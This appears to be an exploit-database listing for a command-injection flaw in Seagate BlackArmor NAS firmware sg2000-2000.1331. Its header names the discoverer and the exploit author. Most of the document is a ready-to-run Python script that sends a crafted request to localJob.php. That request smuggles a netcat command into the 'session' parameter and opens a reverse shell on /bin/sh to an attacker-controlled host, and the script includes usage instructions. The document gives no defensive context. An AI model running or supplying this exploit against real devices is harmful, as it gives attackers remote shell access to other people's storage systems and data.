Exploit for Seagate BlackArmor NAS sg2000-2000.1331 Command Injection

## https://sploitus.com/exploit?id=PACKETSTORM:163523
# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection  
# Date: 15.07.2021  
# Discovered by: Jeroen - IT Nerdbox  
# Exploit Author: Metin Yunus Kandemir  
# Version: sg2000-2000.1331  
# Vendor Homepage: https://www.seagate.com/  
# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/  
  
#!/usr/bin/python3  
  
import requests  
import sys  
  
def exec(target, ncIp, ncPort):  
print("[!] Please check netcat listener: "+ ncPort)  
url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00"  
r = requests.get(url = url)  
sys.exit(1)  
  
def main(args):  
if len(args) != 4:  
print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0]))  
print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80")  
sys.exit(1)  
exec(target=args[1], ncIp=args[2], ncPort=args[3])  
  
  
if __name__ == "__main__":  
main(args=sys.argv)